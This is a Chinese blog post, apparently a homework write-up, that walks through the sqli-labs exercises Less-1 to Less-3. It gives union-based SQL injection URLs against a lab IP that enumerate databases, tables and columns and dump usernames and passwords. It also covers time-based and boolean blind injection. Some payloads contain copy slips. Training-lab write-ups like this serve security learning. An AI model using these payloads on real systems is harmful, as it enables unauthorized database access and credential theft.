sql注入

最新推荐文章于 2022-04-19 11:15:34 发布
最新推荐文章于 2022-04-19 11:15:34 发布
阅读量110 收藏
点赞数
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lwbcsd/article/details/110202145
版权

Less-1
题目:GET-Error based-single quotes-String
输入?id=0’
在这里插入图片描述
1。可以看出类型是字符型

2。1)然后 order by 数字–+ 查看有多少列
2) union select 列数–+ 查看第几横及哪些数据可以回显

3。http://112.126.63.198/Less-1/?id=0’ union select 1, group_concat(schema_name),3 from information_schema.schemata --+ 查询数据库名信息
information_schema.schemata:是指information_schema库下的表schemata,这个表包含所有数据库的名字

4。http://112.126.63.198/Less-1/?id=0’ union select 1,2 group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
查询security内的所有表名
information_schema.tables:是指information_schema库下的表tables,这个表包含所有库中的所有表的信息,且这个表在security库下

5。 group_concat(column_name) from information_schema.columns where table_name=‘users’ 查看security中users内的列名
information_schema.columns:是指information_schema库下的表columns,这个表包含所有库中的所有表的所有列的信息
select group_concat(password) from users
select group_concat(username) from users
查询所有的用户名,密码

为什么id要等于0而不能等于1呢,
因为联合查询,union两边的条件都要符合,(即不是错的),要显示所有的username和password信息,如果前面的id=1的话就只输出id=1的username和password,而id=0的话就找不到,就只有后面的条件
在这里插入图片描述
Less-2
题目:GET-Error based-single intiger-String
输入?id=0’
在这里插入图片描述 可以看出是数字型
2。1)然后 order by 数字–+ 查看有多少列
2) union select 列数–+ 查看第几横及哪些数据可以回显
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+
查询security内的所有表名
5。select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查看security中users内的列名
select group_concat(password) from security.users
select group_concat(username) from security.users
查询所有的用户名,密码
在这里插入图片描述
Less-3
题目:GET-Error based-single quotes with twist-String
输入?id=0’
在这里插入图片描述
可以看出要加一个)
。1)然后 order by 数字–+ 查看有多少列
2) union select 列数–+ 查看第几横及哪些数据可以回显
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+
查询security内的所有表名
5。select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查看security中users内的列名
select group_concat(password) from security.users
select group_concat(username) from security.users
查询所有的用户名,密码
在这里插入图片描述sql盲注
方法一:时间盲注
利用if()函数
if(length(database())>=n,sleep(5),1)
如果该网站使用的数据库名的长度大于等于n则延迟5秒后才有回显,否侧直接回显
之后猜表名,列名都一样
方法二:布尔盲注
常用函数
left(字符串,长度)从最左边开始截取所指定的长度
right(字符串,长度)从最右边开始截取所指定的长度

字符型sql注入
若输入?id=1 —+
则mysql语句为select column_name from table_name where id=‘1 --+’
如果在注释符(–+,#)或其他符号前面出现了’(单引号)或者"(双引号),则该符号不起原本了作用,只是一个普通的字符,引号里面视为一个整体

lwbcsd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL基础语法
weixin_44594263的博客
12-29 100
SQL基础教程语法 1.SQL SELECT DISTINCT 语法:SELECT DISTINCT 列名称 FROM 表名称 举例:SELECT DISTINCT Company FROM Orders (去除Company中的重复数据) 2.SQL WHERE 子句:SELECT 列名称 FROM 表名称 WHERE 列 运算符 值** 举例:如果只希望选取居住在城市 “Beijing” 中的人 SELECT * FROM Persons WHERE City=‘Beijing’; 注意:SQL 使
SQL基本知识-2
Hexahedron的博客
01-19 84
SQL基本知识-2
SQL-基本使用及部分常用关键字与函数
w576233728的博客
07-25 591
一,前言 数据分析基本的代码能力是对SQL的使用,下面对业务中实际用到的语法和函数进行学习及总结。 二,常用关键字与函数 SQL的书写规范:语句中出现的所有表名、字段名全部小写,系统保留字、内置函数名、SQL保留字大写(SQL本身不区分大小写,大写可能是为了增加可读性?) SQL注释: MySQL——1,单行注释使用“#”或者“-- ”(第二种方法后有一个空格)2,多行注释使用“/* *...
mysql中SQL语句查询表字段名、注释、字段类型
终是庄周
04-24 1万+
查询dababase当前库下所有表名及表注释 select column_name,column_comment,data_type from information_schema.columns where table_name='你的表名' 查询当前表下所有字段名及字段注释,以及类型 SELECT TABLE_NAME,TABLE_COMMENT FROM information_...
SQL 快速参考
wangchen2633的博客
07-13 360
SQL 语句 语法 AND / OR SELECT column_name(s) FROM table_name WHERE condition AND|OR condition ALTER TABLE ALTER TABLE table_name  ADD column_name datatype or ALTER TABLE t
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
Mysql基础(1)
yanghaitao5000的博客
07-27 1149
1、正常查询: SELECTcolumn_name,column_nameFROMtable_name; SELECT * FROMtable_name; 2、去重查询: SELECT DISTINCTcolumn_nameFROMtable_name; selectdistinctID,AA,BBfromtName 与 selectdistinctIDfromtName 有什么区别?? 有区别,前面的会选择唯一的一行。后面的选择唯一列。 前一种只要三个字段都不重复...
使用SQL语句查询每张表的column name
ande6905的博客
01-05 837
exec sp_columns tableName 上面这行代码可以查出该表所有的column,改为sp_pkeys,可以查出该表的主键。但是我如果想只查出column name,select COLUMN_NAME FROM(exec sp_columns tableName) as A,这样写是不行的,必须要create一张表,把数据insert进去。 还有另外一种方法可...
sql查询表名、列名、列属性
热门推荐
wf4878921的专栏
04-12 5万+
SQL查询表名、列名、列属性 Oracle:  1.查询表名:   select table_name,tablespace_name,temporary from user_tables //在所有非管理员创建的表中查询 ‍      select table_name,tablespace_name,temporary from dba_ta
SQL COUNT(column_name) 语法
数据库
01-08 853
COUNT(column_name) 函数返回指定列的值的数目(NULL 不计入) COUNT(*) 函数返回表中的记录数 计算一个表中有几行数据: select count(*) from 表名; <wbr></wbr>...
SQL里的count(*)、count(1)、count(column_name)的区别
qq_31525005的博客
02-19 426
SQL里的count(*)、count(1)、count(column_name)的区别 1、主要区别 1)count(*)所有行进行统计,包含值为null的行。 2)count(column)会对指定列具有的行数进行统计,除去值为NULL的行。 3)count(1)与count(*) 的效果是一样的。 2、性能问题 1)In any case,SELECT COUNT(*) FROM table...
oracle 列名sql,SQL查询表名、列名、列属性-Oracle
weixin_42175516的博客
04-10 1552
SQL查询表名、列名、列属性Oracle:1.查询表名:Sql代码select table_name,tablespace_name,temporary from user_tables //在所有非管理员创建的表中查询select table_name,tablespace_name,temporary from dba_tables //在所有管理员创建的表中查询select table_...
SQL语句快速参考
你要明白,任何问题都不是孤立存在的,一定有人曾经遇到过,并且已经有更好的解决办法了,只是我还不知道。我不应该在黑暗中独自前行,去重新发明轮子,也许我的顿悟,只是别人的基本功!我应该要站在巨人的肩膀上,学习更成熟的经验和方法,然后再来解决这个问题
06-27 322
SQL 语句快速参考SQL 语句语法AND / ORSELECT column_name(s)FROM table_nameWHERE conditionAND|OR conditionALTER TABLEALTER TABLE table_name ADD column_name datatypeorALTER TABLE table_name DROP COLUMN column_nameA...
SQL注入之MYSQL注入
av11566的博客
04-19 7056
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值